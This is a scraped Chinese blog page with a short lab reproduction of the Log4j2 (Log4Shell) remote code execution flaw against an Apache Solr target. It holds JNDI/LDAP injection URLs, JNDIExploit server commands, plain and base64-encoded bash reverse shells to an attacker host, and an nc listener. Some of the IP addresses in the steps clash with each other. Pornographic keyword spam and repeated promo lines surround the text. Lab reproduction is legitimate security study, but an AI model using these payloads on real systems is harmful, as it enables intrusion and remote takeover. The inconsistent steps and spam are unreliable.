欧美free性护士vide0shd,老熟女,一区二区三区,久久久久夜夜夜精品国产,久久久久久综合网天天,欧美成人护士h版

首頁綜合 正文
目錄

柚子快報激活碼778899分享:log4j2漏洞復現(xiàn)

柚子快報激活碼778899分享:log4j2漏洞復現(xiàn)

http://yzkb.51969.com/

Log4j2是Apachel的一個java日志框架,我們借助它進行日志相關操作管理,然而在2021年未10g4j2爆出了遠程代碼執(zhí)行漏洞,屬于嚴重等級的漏洞

1、執(zhí)行以下命令啟動靶場環(huán)境并在瀏覽器訪問

2、在DNSlog平臺請求一個dns域名:

http://192.168.3.70:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.649god.dnslog.cn}

直接訪問

可知版本信息1.8.0

3、反彈shell需要使用JNDIExploit.v1.2

此時,

kali2024:中轉(zhuǎn)--192.168.3.232

kali2023:攻擊--192.168.3.137

centos7:靶機--192.168.3.70

首先在中轉(zhuǎn)機上使用JNDIExploit-1.2-SNAPSHOT.jar文件使用java啟動,命令如下:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.3.179

bash -i >& /dev/tcp/192.168.3.70/8080 0>&1

java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTM3LzgwODAgMD4mMQ==} | {base64, -d} |bash" -A 192.168.3.137

攻擊機:開啟監(jiān)聽nc -lvvp 6666

此時構(gòu)造如下命令:

http://192.168.3.70:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.137:1389/0izjha}

訪問,成功反彈

http://192.168.3.70:8983為靶機的地址

192.168.3.232為中轉(zhuǎn)機地址

192.168.3.137為Kali攻擊機ip地址,此時要反彈shell

柚子快報激活碼778899分享:log4j2漏洞復現(xiàn)

http://yzkb.51969.com/

推薦閱讀

評論可見,查看隱藏內(nèi)容

本文內(nèi)容根據(jù)網(wǎng)絡資料整理,出于傳遞更多信息之目的,不代表金鑰匙跨境贊同其觀點和立場。

轉(zhuǎn)載請注明,如有侵權,聯(lián)系刪除。

本文鏈接:http://m.gantiao.com.cn/post/19285834.html

發(fā)布評論

您暫未設置收款碼

請在主題配置——文章設置里上傳

掃描二維碼手機訪問

文章目錄